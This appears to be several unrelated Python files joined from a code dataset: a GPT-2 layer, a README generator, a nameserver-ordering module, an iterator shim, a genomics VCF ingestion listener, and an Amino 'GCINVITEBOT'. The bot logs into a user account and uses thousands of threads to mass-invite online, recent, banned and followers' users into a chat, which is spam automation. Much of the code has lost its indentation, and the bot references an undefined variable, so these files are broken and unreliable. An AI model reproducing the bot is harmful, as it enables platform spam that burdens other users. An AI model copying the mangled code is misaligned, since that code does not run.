        # Project hidden states back to the vocabulary dimension.
        proj_weights = self.layer_weights if self.proj_weights is None else self.proj_weights
        h_flat = tf.reshape(x, [-1, d_model])
        logits = tf.matmul(h_flat, proj_weights)
        return tf.reshape(logits, [batch, sequence, self.output_dim])
class DecoderLayer(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, dff,
dr_rate=0.45):
super(DecoderLayer, self).__init__()
self.d_model = d_model
self.num_heads = num_heads
self.dff = dff
self.dr_rate = dr_rate
self.mha = MultiHeadAttention(self.d_model, self.num_heads)
self.feed_forward = FeedForward(self.d_model, self.dff, self.dr_rate)
self.layer_norm1 = LayerNormalization(self.d_model)
self.layer_norm2 = LayerNormalization(self.d_model)
def call(self, x, training, mask, past=None):
out, present = self.mha(self.layer_norm1(x), mask=mask, past_layer=past,
training=training) # (batch_size, input_seq_len, d_model)
with tf.name_scope("residual_conn"):
x = x + out
out = self.feed_forward(self.layer_norm2(x), training=training) # (batch_size, input_seq_len, d_model)
with tf.name_scope("residual_conn"):
x = x + out
return x, present
def run():
sequence_size = 12
trainTensor, testTensor, tokenizer = simple_method(sequence_size)
model = Gpt2(6, 512, 8, 512, sequence_size, vocab_size=tokenizer.vocab_size+3, tokenizer=tokenizer, optimizer='adam')
opt = model.create_optimizer()
model.create_checkpoint_manager('checkpoint')
model.create_summary_writer('logs')
model.compile(loss=model.loss_object, optimizer=opt)
model.fit(trainTensor, testTensor)
# model.save('aesop')
| StarcoderdataPython |
1777759 | <filename>docs/generate-readme.py
# Run this as a pre-commit script.
# Will be a no-op unless docs have changed.
#
# Takes readme-generator.md and creates:
# 1. A jekyll-ready markdown file with includes for dynamic github pages
# 2. A github-ready markdown file with images for static pages
import os
import sys
def initialize_dynamic_lines():
return [
'---\n',
'layout: default\n',
'---\n'
]
def initialize_static_lines():
return [
'# A lightweight range slider with expandable timeline\n\n',
'See this project at [artoonie.github.io/timeline-range-slider](https://artoonie.github.io/timeline-range-slider)\n\n',
'The project page has dynamic sliders you can interact with.\n\n',
'\n',
'[](https://coveralls.io/github/artoonie/timeline-range-slider?branch=main)\n',
'\n',
'\n'
'\n'
]
def isFileDataEqual(filename, expectedlines):
# Is expectedlines equal to filename?
with open(filename, 'r') as f:
lines = f.readlines()
return lines == expectedlines
def create_derived_files(input_filename, output_static_filename, output_dynamic_filename):
# Map from a magic key to a triple:
# 1. variable name (just a helper - must match the key)
# 2. What file to include in the dynamic file?
# 3. What file to include in the static file?
magic_keys = {
'{{ deps }}\n': ('deps', 'docs/deps.html', None),
'{{ ex0 }}\n': ('ex0', 'docs/example-0-teaser.html', 'docs/images/ex0.png'),
'{{ ex1 }}\n': ('ex1', 'docs/example-1-default.html', 'docs/images/ex0.png'),
'{{ ex2 }}\n': ('ex2', 'docs/example-2-darkmode.html', 'docs/images/ex2.png'),
'{{ ex3 }}\n': ('ex3', 'docs/example-3-small.html', 'docs/images/ex3.png'),
'{{ ex4 }}\n': ('ex4', 'docs/example-4-custom-tick-text.html', 'docs/images/ex4.png')
}
# Small enough to just read it all into memory,
# why complicate things?
with open(input_filename, 'r') as f:
lines = f.readlines()
static_lines = initialize_static_lines()
dynamic_lines = initialize_dynamic_lines()
for line in lines:
if line not in magic_keys:
static_lines.append(line)
dynamic_lines.append(line)
continue
# Magic keyword found. Do magic for static or dynamic
(key, dynamic_content, static_content) = magic_keys[line]
if static_content is not None:
# Replace the static content
static_lines.append(f'\n[\[interactive demo\]](https://artoonie.github.io/timeline-range-slider)\n')
            # static_content (the example screenshot path) was unpacked above but never used;
            # embedding it here is assumed to be the intent.
            static_lines.append(f'\n')
# Include the actual content + the dynamic content
include_line = '{% capture ' + key + ' %}'
include_line += '{% include_relative ' + dynamic_content + ' %}'
include_line += '{% endcapture %}\n'
dynamic_lines.append(include_line)
dynamic_lines.append(line)
# Safety check: don't overwrite accidental changes
stream = os.popen('git diff --name-only')
diffs = stream.read()
# Make sure we didn't accidentally change README.md or index.md
if output_dynamic_filename in diffs:
if not isFileDataEqual(output_dynamic_filename, dynamic_lines):
print(f"File {output_dynamic_filename} is dirty. Refusing to overwrite.")
sys.exit(-1)
if output_static_filename in diffs:
if not isFileDataEqual(output_static_filename, static_lines):
print(f"File {output_static_filename} is dirty. Refusing to overwrite.")
sys.exit(-1)
# Finally, write it all
with open(output_static_filename, 'w') as f:
f.write(''.join(static_lines))
with open(output_dynamic_filename, 'w') as f:
f.write(''.join(dynamic_lines))
create_derived_files('docs/readme-generator.md', 'README.md', 'index.md')
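# For reference, given the magic_keys table above, a '{{ ex2 }}' line in readme-generator.md
# expands in the dynamic index.md to:
#   {% capture ex2 %}{% include_relative docs/example-2-darkmode.html %}{% endcapture %}
#   {{ ex2 }}
# while README.md receives the interactive-demo link block instead.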
| StarcoderdataPython |
126247 | <reponame>HOTNSPICY12/InviteFuckKwel
import amino, concurrent.futures
import os
print("\t\033[1;31m GCINVITEBOT\n\n")
print("\t\033[1;32m Script by \033[1;36mMr.COMRADE \n\n")
print("\t\033[1;32m Again fixed by: \033[1;36mPRINCE OF PERSIA \n\n")
client = amino.Client()
email = input("Email: ")
password = input("Password: ")
client.login(email=email, password=password)
clients = client.sub_clients(size=100)
for x, name in enumerate(clients.name, 1):
print(f"{x}.{name}")
communityid = clients.comId[int(input("Select the community: "))-1]
sub_client = amino.SubClient(comId=communityid, profile=client.profile)
chats = sub_client.get_chat_threads(size=100)
for z, title in enumerate(chats.title, 1):
print(f"{z}.{title}")
chatx = chats.chatId[int(input("Select the chat: "))-1]
#invite functions(def) thanks to https://github.com/LynxN1 for example
def inviteonlineusers():
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
onlineusers = sub_client.get_online_users(start=i, size=5000).profile.userId
if onlineusers:
for userId in onlineusers:
print(f"{userId} Invited/")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
else:
break
for i in range(0, 20000, 250):
publichats = sub_client.get_public_chat_threads(type="recommended", start=i, size=5000).chatId
chatsuin = sub_client.get_chat_threads(start=i, size=100).chatId
chats = [*publichats, *chatsuin]
if chats:
for chatid in chats:
for u in range(0, 1000, 50):
users = sub_client.get_chat_users(chatId=chatid, start=u, size=100).userId
if users:
for userId in users:
try:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
except:
pass
else:
break
print("Invited All Online Users")
def inviteuserfollowers():
userlink=input("Type user link: ")
user=client.get_from_code(userlink)
userx=user.objectId
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
followers = sub_client.get_user_followers(userId=userx, start=i, size=100).profile.userId
if followers:
for userId in followers:
try:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
except:
pass
else:
break
print("Invited User Followers/....")
def inviterecentbannedusers():
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
recentusers = sub_client.get_all_users(type="recent", start=i, size=100).profile.userId
bannedusers = sub_client.get_all_users(type="banned", start=i, size=100).profile.userId
users = [*recentusers, *bannedusers]
if users:
for userId in users:
print(f"{names} Invited/.....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
else:
break
print("Invited Recent & Banned Users")
def inviteallusers():
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
for i in range(0, 20000, 250):
onlineusers = sub_client.get_online_users(start=i, size=100).profile.userId
recentusers = sub_client.get_all_users(type="recent", start=i, size=100).profile.userId
bannedusers = sub_client.get_all_users(type="banned", start=i, size=100).profile.userId
users = [*onlineusers, *recentusers, *bannedusers]
if users:
for userId in users:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
else:
break
for i in range(0, 20000, 250):
publichats = sub_client.get_public_chat_threads(type="recommended", start=i, size=100).chatId
chatsuin = sub_client.get_chat_threads(start=i, size=100).chatId
chats = [*publichats, *chatsuin]
if chats:
for chatid in chats:
for u in range(0, 1000, 50):
users = sub_client.get_chat_users(chatId=chatid, start=u, size=100).userId
if users:
for userId in users:
try:
print(f"{userId} Invited/....")
_ = [executor.submit(sub_client.invite_to_chat, userId, chatx)]
except:
pass
else:
break
print("Invited All Online Users:")
#invite functions(def) thanks to https://github.com/LynxN1 for example
print("1.Invite Online Users:")
print("2.Invite User Followers:")
print("3.Invite Recent & Banned Users:")
print("4.Invite All Users:")
inviteselect = input("Type Number: ")
if inviteselect == "1":
inviteonlineusers()
elif inviteselect == "2":
inviteuserfollowers()
elif inviteselect == "3":
inviterecentbannedusers()
elif inviteselect == "4":
inviteallusers()
| StarcoderdataPython |
82333 | import sys
import time
import random
from .address import Address
__all__ = [
'NameServers',
'NoNameServer',
]
class NoNameServer(Exception):
pass
class IterMixIn:
def iter(self):
if not self.data: raise NoNameServer
return iter(self.data)
def success(self, item):
pass
def fail(self, item):
pass
class WeightMixIn:
def __init__(self, *k, **kw):
self._failures = [0] * len(self.data)
self.ts = 0
self._update()
def _update(self):
if time.time() > self.ts + 60:
self.ts = time.time()
self._sorted = list(self.data[i] for i in sorted(range(len(self.data)), key=lambda i: self._failures[i]))
self._last_min_failures = self._failures
self._failures = [0] * len(self.data)
def success(self, item):
self._update()
def fail(self, item):
self._update()
index = self.data.index(item)
self._failures[index] += 1
def iter(self):
if not self.data: raise NoNameServer
return iter(self._sorted)
class NameServers(WeightMixIn, IterMixIn):
def __init__(self, nameservers=[], **kw):
self.data = [Address.parse(item, default_protocol='udp', allow_domain=True) for item in nameservers]
super().__init__(**kw)
def __bool__(self):
return len(self.data) > 0
def __iter__(self):
return iter(self.data)
def __repr__(self):
return '<NameServers [%s]>' % ','.join(map(str, self.data))
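# Illustrative usage sketch (the resolver addresses are arbitrary examples, not defaults):
#
#   servers = NameServers(['8.8.8.8', '1.1.1.1'])
#   for addr in servers.iter():      # hosts with fewer recent failures are tried first
#       try:
#           ...                      # attempt the query against `addr`
#           servers.success(addr)
#           break
#       except Exception:
#           servers.fail(addr)       # recorded failures reorder later iterations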
| StarcoderdataPython |
2238 | class SeqIter:
def __init__(self,l):
self.l = l
self.i = 0
self.stop = False
def __len__(self):
return len(self.l)
def __list__(self):
l = []
while True:
try:
l.append(self.__next__())
except StopIteration:
break
return l
def __iter__(self):
return self
def __next__(self):
has_length = True
found = False
try:
self.l.__len__()
except AttributeError:
has_length = False
try:
if self.stop:
raise StopIteration()
if has_length and self.i >= self.l.__len__():
self.stop = True
raise StopIteration()
ret = self.l[self.i]
found = True
except IndexError:
raise StopIteration()
except StopIteration:
raise StopIteration()
self.i += 1
if found:
return ret
else:
return None
___assign("%SeqIter", SeqIter)
def iter(l, *args):
callable = ___id("%callable")
if args.__len__() == 1:
if callable(l):
stopwhen = args[0]
return FuncIter(l, stopwhen)
else:
TypeError("iter(v, w): v must be callable")
elif args.__len__() == 0:
try:
return l.__iter__()
except:
try:
if callable(l.__getitem__):
return SeqIter(l)
except:
raise TypeError("object is not iterable")
else:
raise TypeError("iter expect at most 2 arguments")
___assign("%iter", iter)
def next(it, *arg):
if len(arg) == 0:
return it.__next__()
else:
return it.__next__(arg[0])
___assign("%next", next)
class FuncIter:
def __init__(self, func, stopwhen):
self.func = func
self.stopwhen = stopwhen
self.stopped = False
def __list__(self):
l = []
while not self.stopped:
try:
l.append(self.__next__())
except StopIteration:
break
return l
def __next__(self):
f = self.func
v = f()
if v == self.stopwhen:
self.stopped = True
raise StopIteration()
else:
return v
___assign("%FuncIter", FuncIter)
| StarcoderdataPython |
1627295 | import argparse
import atexit
import boto3
import botocore.exceptions
import cgi
import datetime
import elasticsearch
import io
import json
import os
import psycopg2
import re
import requests # XXX: C4-211 should not be needed but is // KMP needs this, too, until subrequest posts work
import signal
import structlog
import threading
import time
import webtest
import tempfile
from dcicutils.env_utils import is_stg_or_prd_env
from dcicutils.misc_utils import VirtualApp, ignored, check_true, full_class_name, environ_bool, PRINT
from pyramid import paster
from pyramid.httpexceptions import HTTPNotFound, HTTPMovedPermanently # , HTTPServerError
from pyramid.request import Request
# Possibly still needed by some commented-out code.
# from pyramid.response import Response
from pyramid.view import view_config
from snovault.util import debug_log
from vcf import Reader
from .ingestion.vcf_utils import VCFParser, StructuralVariantVCFParser
from .commands.reformat_vcf import runner as reformat_vcf
from .commands.add_altcounts_by_gene import main as add_altcounts
from .ingestion.common import metadata_bundles_bucket, get_parameter, IngestionReport
from .ingestion.exceptions import UnspecifiedFormParameter, SubmissionFailure # , BadParameter
from .ingestion.processors import get_ingestion_processor
# from .types.base import get_item_or_none
from .types.ingestion import SubmissionFolio, IngestionSubmission
from .util import (
resolve_file_path, gunzip_content,
debuglog, get_trusted_email, beanstalk_env_from_request,
subrequest_object, register_path_content_type, vapp_for_email, vapp_for_ingestion,
)
from .ingestion.queue_utils import IngestionQueueManager
from .ingestion.variant_utils import VariantBuilder, StructuralVariantBuilder
log = structlog.getLogger(__name__)
EPILOG = __doc__
INGESTION_QUEUE = 'ingestion_queue'
VARIANT_SCHEMA = resolve_file_path('./schemas/variant.json')
VARIANT_SAMPLE_SCHEMA = resolve_file_path('./schemas/variant_sample.json')
STATUS_QUEUED = 'Queued'
STATUS_INGESTED = 'Ingested'
STATUS_DISABLED = 'Ingestion disabled'
STATUS_ERROR = 'Error'
STATUS_IN_PROGRESS = 'In progress'
SHARED = 'shared'
STRUCTURAL_VARIANT_SCHEMA = resolve_file_path("./schemas/structural_variant.json")
STRUCTURAL_VARIANT_SAMPLE_SCHEMA = resolve_file_path(
"./schemas/structural_variant_sample.json"
)
def includeme(config):
# config.add_route('process_ingestion', '/process_ingestion')
config.add_route('queue_ingestion', '/queue_ingestion')
config.add_route('ingestion_status', '/ingestion_status')
config.add_route('submit_for_ingestion', '/submit_for_ingestion')
config.registry[INGESTION_QUEUE] = IngestionQueueManager(config.registry)
config.scan(__name__)
SUBMISSION_PATTERN = re.compile(r'^/ingestion-submissions/([0-9a-fA-F-]+)(|/.*)$')
register_path_content_type(path='/submit_for_ingestion', content_type='multipart/form-data')
def extract_submission_info(request):
matched = SUBMISSION_PATTERN.match(request.path_info)
if matched:
submission_id = matched.group(1)
else:
raise SubmissionFailure("request.path_info is not in the expected form: %s" % request.path_info)
instance = subrequest_object(request, submission_id)
return submission_id, instance
@view_config(name='submit_for_ingestion', request_method='POST', context=IngestionSubmission,
# Apparently adding this 'accept' causes discrimination on incoming requests not to find this method.
# We do want this type, and instead we check the request to make sure we got it, but we omit it here
# for practical reasons. -kmp 10-Sep-2020
# accept='multipart/form-data',
permission='edit')
@debug_log
def submit_for_ingestion(context, request):
ignored(context)
check_true(request.content_type == 'multipart/form-data', # even though we can't declare we accept this
"Expected request to have content_type 'multipart/form-data'.", error_class=SubmissionFailure)
bs_env = beanstalk_env_from_request(request)
bundles_bucket = metadata_bundles_bucket(request.registry)
datafile = request.POST['datafile']
if not isinstance(datafile, cgi.FieldStorage):
# e.g., specifically it might be b'' when no file is selected,
# but IMPORTANTLY, cgi.FieldStorage has no predefined boolean value,
# so we can't just ask to check 'not datafile'. Sigh. -kmp 5-Aug-2020
raise UnspecifiedFormParameter('datafile')
filename = datafile.filename
override_name = request.POST.get('override_name', None)
parameters = dict(request.POST) # Convert to regular dictionary, which is also a copy
parameters['datafile'] = filename
# Other parameters, like validate_only, will ride in on parameters via the manifest on s3
submission_id, instance = extract_submission_info(request)
# The three arguments institution, project, and ingestion_type were needed in the old protocol
# but are not needed in the new protocol because someone will have set up the IngestionSubmission
# object already with the right values. We tolerate them here, but we insist they be consistent (redundant).
# Note, too, that we use the 'update=True' option that causes them to be added to our parameters if they are
# missing, defaulted from the previous item, so that they will be written to the parameter block stored on S3.
# (We could do that differently now, by looking them up dynamically, but rather than risk making a mistake,
# I just went with path of least resistance for now.)
# -kmp 2-Dec-2020
institution = instance['institution']['@id']
institution_arg = get_parameter(parameters, "institution", default=institution, update=True)
if institution_arg != institution:
# If the "institution" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'institution' was supplied inconsistently for submit_for_ingestion.")
project = instance['project']['@id']
project_arg = get_parameter(parameters, "project", default=project, update=True)
if project_arg != project:
# If the "project" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'project' was supplied inconsistently for submit_for_ingestion.")
ingestion_type = instance['ingestion_type']
ingestion_type_arg = get_parameter(parameters, "ingestion_type", default=ingestion_type, update=True)
if ingestion_type_arg != ingestion_type:
# If the "ingestion_type" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'ingestion_type' was supplied inconsistently for submit_for_ingestion.")
# ``input_file`` contains the actual file data which needs to be
# stored somewhere.
input_file_stream = request.POST['datafile'].file
input_file_stream.seek(0)
# NOTE: Some reference information about uploading files to s3 is here:
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-uploading-files.html
# submission.set_item_detail(object_name=manifest['object_name'], parameters=manifest['parameters'],
# institution=institution, project=project)
# submission_id = str(uuid.uuid4())
_, ext = os.path.splitext(filename)
object_name = "{id}/datafile{ext}".format(id=submission_id, ext=ext)
manifest_name = "{id}/manifest.json".format(id=submission_id)
s3_client = boto3.client('s3')
upload_time = datetime.datetime.utcnow().isoformat()
success = True
message = "Uploaded successfully."
try:
s3_client.upload_fileobj(input_file_stream, Bucket=bundles_bucket, Key=object_name)
except botocore.exceptions.ClientError as e:
log.error(e)
success = False
message = "{error_type}: {error_message}".format(error_type=full_class_name(e), error_message=str(e))
# This manifest will be stored in the manifest.json file on on s3 AND will be returned from this endpoint call.
manifest_content = {
"filename": filename,
"object_name": object_name,
"submission_id": submission_id,
"submission_uri": SubmissionFolio.make_submission_uri(submission_id),
"beanstalk_env_is_prd": is_stg_or_prd_env(bs_env),
"beanstalk_env": bs_env,
"bucket": bundles_bucket,
"authenticated_userid": request.authenticated_userid,
"email": get_trusted_email(request, context="Submission", raise_errors=False),
"success": success,
"message": message,
"upload_time": upload_time,
"parameters": parameters,
}
manifest_content_formatted = json.dumps(manifest_content, indent=2)
if success:
try:
with io.BytesIO(manifest_content_formatted.encode('utf-8')) as fp:
s3_client.upload_fileobj(fp, Bucket=bundles_bucket, Key=manifest_name)
except botocore.exceptions.ClientError as e:
log.error(e)
message = ("{error_type} (while uploading metadata): {error_message}"
.format(error_type=full_class_name(e), error_message=str(e)))
raise SubmissionFailure(message)
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids([submission_id], ingestion_type=ingestion_type)
if failed:
# If there's a failure, failed will be a list of one problem description since we only submitted one thing.
raise SubmissionFailure(failed[0])
if not success:
raise SubmissionFailure(message)
return manifest_content
@view_config(route_name='ingestion_status', request_method='GET', permission='index')
@debug_log
def ingestion_status(context, request):
""" Status route, essentially identical to indexing_status. """
ignored(context)
queue_manager = request.registry[INGESTION_QUEUE]
n_waiting, n_inflight = queue_manager.get_counts()
return {
'title': 'Ingestion Status',
'waiting': n_waiting,
'inflight': n_inflight
}
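# Example response shape from the route above (counts are illustrative):
#   {"title": "Ingestion Status", "waiting": 3, "inflight": 1}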
DEBUG_SUBMISSIONS = environ_bool("DEBUG_SUBMISSIONS", default=False)
def process_submission(*, submission_id, ingestion_type, app, bundles_bucket=None, s3_client=None):
bundles_bucket = bundles_bucket or metadata_bundles_bucket(app.registry)
s3_client = s3_client or boto3.client('s3')
manifest_name = "{id}/manifest.json".format(id=submission_id)
data = json.load(s3_client.get_object(Bucket=bundles_bucket, Key=manifest_name)['Body'])
email = None
try:
email = data['email']
except KeyError as e:
debuglog("Manifest data is missing 'email' field.")
if DEBUG_SUBMISSIONS:
pass
# import pdb; pdb.set_trace()
debuglog("processing submission %s with email %s" % (submission_id, email))
with vapp_for_email(email=email, app=app) as vapp:
if DEBUG_SUBMISSIONS:
PRINT("PROCESSING FOR %s" % email)
submission = SubmissionFolio(vapp=vapp, ingestion_type=ingestion_type, submission_id=submission_id, log=None)
handler = get_ingestion_processor(ingestion_type)
result = handler(submission)
if DEBUG_SUBMISSIONS:
PRINT("DONE PROCESSING FOR %s" % email)
return {
"result": result,
"ingestion_type": ingestion_type,
"submission_id": submission_id,
}
def verify_vcf_file_status_is_not_ingested(request, uuid, *, expected=True):
""" Verifies the given VCF file has not already been ingested by checking
'file_ingestion_status'
"""
kwargs = {
'environ': request.environ,
'method': 'GET',
'content_type': 'application/json'
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = request.invoke_subrequest(subreq)
if isinstance(resp, HTTPMovedPermanently): # if we hit a redirect, follow it
subreq = Request.blank(resp.location, **kwargs)
resp = request.invoke_subrequest(subreq)
log.info('VCF File Meta: %s' % resp.json)
verified = bool(expected) is (resp.json.get('file_ingestion_status', None) != STATUS_INGESTED)
# if not verified:
# import pdb; pdb.set_trace()
return verified
def patch_vcf_file_status(request, uuids):
""" Patches VCF File status to 'Queued'
NOTE: This process makes queue_ingestion not scale terribly well.
Batching above a certain number may result in 504. There are
also permissions concerns here that are not dealt with.
"""
for uuid in uuids:
kwargs = {
'environ': request.environ,
'method': 'PATCH',
'content_type': 'application/json',
'POST': json.dumps({
'file_ingestion_status': STATUS_QUEUED
}).encode('utf-8')
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = None
try:
if verify_vcf_file_status_is_not_ingested(request, uuid):
resp = request.invoke_subrequest(subreq)
except HTTPNotFound:
log.error('Tried to patch %s but item does not exist: %s' % (uuid, resp))
@view_config(route_name='queue_ingestion', request_method='POST', permission='index')
@debug_log
def queue_ingestion(context, request):
""" Queues uuids as part of the request body for ingestion. Can batch as many as desired in a
single request.
"""
ignored(context)
uuids = request.json.get('uuids', [])
override_name = request.json.get('override_name', None)
return enqueue_uuids_for_request(request, uuids, override_name=override_name)
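# Example request body for the route above (uuids are placeholders):
#   POST /queue_ingestion
#   {"uuids": ["<file-uuid-1>", "<file-uuid-2>"], "override_name": null}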
def enqueue_uuids_for_request(request, uuids, *, ingestion_type='vcf', override_name=None):
response = {
'notification': 'Failure',
'number_queued': 0,
        'detail': 'Nothing was queued. Make sure to pass in a list of uuids in the "uuids" key.'
}
    if not uuids:
return response
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids(uuids)
if not failed:
response['notification'] = 'Success'
response['number_queued'] = len(uuids)
response['detail'] = 'Successfully queued the following uuids: %s' % uuids
if ingestion_type == 'vcf':
patch_vcf_file_status(request, uuids) # extra state management - may not be accurate, hard to get right
else:
response['number_queued'] = len(uuids) - len(failed)
response['detail'] = 'Some uuids failed: %s' % failed
return response
def get_queue_manager(request, *, override_name):
return (request.registry[INGESTION_QUEUE]
if not override_name
else IngestionQueueManager(request.registry, override_name=override_name))
class IngestionListener:
""" Organizes helper functions for the ingestion listener """
POLL_INTERVAL = 10 # seconds between each poll
INGEST_AS_USER = environ_bool('INGEST_AS_USER', default=True) # The new way, but possible to disable for now
def __init__(self, vapp, _queue_manager=None, _update_status=None):
self.vapp = vapp
# Get queue_manager
registry = None
if isinstance(self.vapp, (webtest.TestApp, VirtualApp)): # TestApp in testing or VirtualApp in production
registry = self.vapp.app.registry
elif _queue_manager is None: # if we got here, we cannot succeed in starting
raise Exception('Bad arguments given to IngestionListener: %s, %s, %s' %
(self.vapp, _queue_manager, _update_status))
self.queue_manager = IngestionQueueManager(registry) if not _queue_manager else _queue_manager
self.update_status = _update_status
@staticmethod
def should_remain_online(override=None):
""" A function that says whether 'run' should continue. This is provided because it
can be mocked in testing.
:param override: a lambda that will execute when evaluating if specified
:return: True if should stay running, False otherwise
"""
if not override:
return True
return override()
def get_messages(self):
""" Sleeps (as to not hit SQS too frequently) then requests messages,
returning the result bodies.
NOTE: THIS FUNCTION SHOULD NOT BE USED OUTSIDE OF THIS CODE SINCE
IT BLOCKS FOR RATE LIMITING REASONS
:return: messages available on SQS
"""
time.sleep(self.POLL_INTERVAL) # sleep here before polling again
return self.queue_manager.receive_messages()
def delete_messages(self, messages):
""" Deletes messages from SQS (after they have been processed). Does not return
anything but will log if messages fail deletion.
:param messages: messages to be deleted
"""
failed = self.queue_manager.delete_messages(messages)
        tries = 3
        while True:
            debuglog("Trying to delete messages")
if failed:
debuglog("Failed to delete messages")
if tries > 0:
failed = self.queue_manager.delete_messages(failed) # try again
tries -= 1
else:
log.error('Failed to delete messages from SQS: %s' % failed)
break
else:
debuglog("Deleted messages")
break
def _patch_value(self, uuid, field, value):
""" Patches field with value on item uuid """
self.vapp.patch_json('/' + uuid, {field: value})
def patch_ingestion_report(self, report, uuid):
""" Sets the file_ingestion_error field of the given uuid """
if isinstance(report, IngestionReport): # handle normal case
self._patch_value(uuid, 'file_ingestion_error', report.get_errors())
elif isinstance(report, list): # handle when build_ingestion_error_report result is passed
self._patch_value(uuid, 'file_ingestion_error', report)
else:
raise TypeError('Got bad type for ingestion error report: %s' % report)
def set_status(self, uuid, status):
""" Sets the file_ingestion_status of the given uuid """
self._patch_value(uuid, 'file_ingestion_status', status)
@staticmethod
def build_ingestion_error_report(msg):
""" Builds an ingestion error report in case an error is encountered that cannot be recovered from
in VCF ingestion - see file_processed.json for structure definition. """
return [
{
'body': msg,
'row': -1 # this exception may have occurred on a particular row but since it could not be recovered
} # from we assume the msg has sufficient info to work backwards from - Will 4/9/21
]
def run(self):
""" Main process for this class. Runs forever doing ingestion as needed.
HIGH LEVEL LOGIC:
while True:
while there are messages available:
for each message:
download, decompress, ingest, patch file status to "Ingested"
delete processed messages
"""
log.info('Ingestion listener successfully online.')
debuglog("Ingestion listener started.")
messages = [] # This'll get a better value below in each loop iteration. This is just a declaration of intent.
def discard(msg):
self.delete_messages([msg])
# Assuming we didn't get an error trying to remove it,
# it should also get removed from our to-do list.
messages.remove(msg)
while self.should_remain_online():
debuglog("About to get messages.")
messages = self.get_messages() # wait here
debuglog("Got", len(messages), "messages.")
# ingest each VCF file
for message in messages:
debuglog("Message:", message)
body = json.loads(message['Body'])
uuid = body['uuid']
ingestion_type = body.get('ingestion_type', 'vcf') # Older protocol doesn't yet know to expect this
log.info('Ingesting uuid %s' % uuid)
if ingestion_type != 'vcf':
# Let's minimally disrupt things for now. We can refactor this later
# to make all the parts work the same -kmp
if self.INGEST_AS_USER:
try:
debuglog("REQUESTING RESTRICTED PROCESSING:", uuid)
process_submission(submission_id=uuid,
ingestion_type=ingestion_type,
# bundles_bucket=submission.bucket,
app=self.vapp.app)
debuglog("RESTRICTED PROCESSING DONE:", uuid)
except Exception as e:
log.error(e)
else:
submission = SubmissionFolio(vapp=self.vapp, ingestion_type=ingestion_type,
submission_id=uuid)
handler = get_ingestion_processor(ingestion_type)
try:
debuglog("HANDLING:", uuid)
handler(submission)
debuglog("HANDLED:", uuid)
except Exception as e:
log.error(e)
                    # If we succeeded, we don't need to do it again, and if we failed we don't need to fail again.
discard(message)
continue
debuglog("Did NOT process", uuid, "as", ingestion_type)
# locate file meta data
try:
file_meta = self.vapp.get('/' + uuid).follow().json
location = self.vapp.get(file_meta['href']).location
log.info('Got vcf location: %s' % location)
except Exception as e:
log.error('Could not locate uuid: %s with error: %s' % (uuid, e))
continue
# if this file has been ingested (or explicitly disabled), do not do anything with this uuid
if file_meta.get('file_ingestion_status', 'N/A') in [STATUS_INGESTED, STATUS_DISABLED]:
log.error('Skipping ingestion of file %s due to disabled ingestion status' % uuid)
continue
# attempt download with workaround
try:
raw_content = requests.get(location).content
except Exception as e:
log.error('Could not download file uuid: %s with error: %s' % (uuid, e))
continue
# gunzip content, pass to parser, post variants/variant_samples
# patch in progress status
self.set_status(uuid, STATUS_IN_PROGRESS)
# decoded_content = gunzip_content(raw_content)
# debuglog('Got decoded content: %s' % decoded_content[:20])
vcf_type = file_meta.get("variant_type", "SNV")
if vcf_type == "SNV":
# Apply VCF reformat
vcf_to_be_formatted = tempfile.NamedTemporaryFile(suffix='.gz')
vcf_to_be_formatted.write(raw_content)
formatted = tempfile.NamedTemporaryFile()
reformat_args = {
'inputfile': vcf_to_be_formatted.name,
'outputfile': formatted.name,
'verbose': False
}
reformat_vcf(reformat_args)
# Add altcounts by gene
# Note: you cannot pass this file object to vcf.Reader if it's in rb mode
# It's also not guaranteed that it reads utf-8, so pass explicitly
formatted_with_alt_counts = tempfile.NamedTemporaryFile(mode='w+', encoding='utf-8')
alt_counts_args = {
'inputfile': formatted.name,
'outputfile': formatted_with_alt_counts.name
}
add_altcounts(alt_counts_args)
parser = VCFParser(None, VARIANT_SCHEMA, VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_with_alt_counts))
variant_builder = VariantBuilder(self.vapp, parser, file_meta['accession'],
project=file_meta['project']['@id'],
institution=file_meta['institution']['@id'])
elif vcf_type == "SV":
                    # No reformatting necessary for SV VCF
decoded_content = gunzip_content(raw_content)
debuglog('Got decoded content: %s' % decoded_content[:20])
formatted_vcf = tempfile.NamedTemporaryFile(
mode="w+", encoding="utf-8"
)
formatted_vcf.write(decoded_content)
formatted_vcf.seek(0)
parser = StructuralVariantVCFParser(
None,
STRUCTURAL_VARIANT_SCHEMA,
STRUCTURAL_VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_vcf),
)
variant_builder = StructuralVariantBuilder(
self.vapp,
parser,
file_meta["accession"],
project=file_meta["project"]["@id"],
institution=file_meta["institution"]["@id"],
)
try:
success, error = variant_builder.ingest_vcf()
except Exception as e:
# if exception caught here, we encountered an error reading the actual
# VCF - this should not happen but can in certain circumstances. In this
# case we need to patch error status and discard the current message.
log.error('Caught error in VCF processing in ingestion listener: %s' % e)
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(self.build_ingestion_error_report(msg=e), uuid)
discard(message)
continue
# report results in error_log regardless of status
msg = variant_builder.ingestion_report.brief_summary()
log.error(msg)
if self.update_status is not None and callable(self.update_status):
self.update_status(msg=msg)
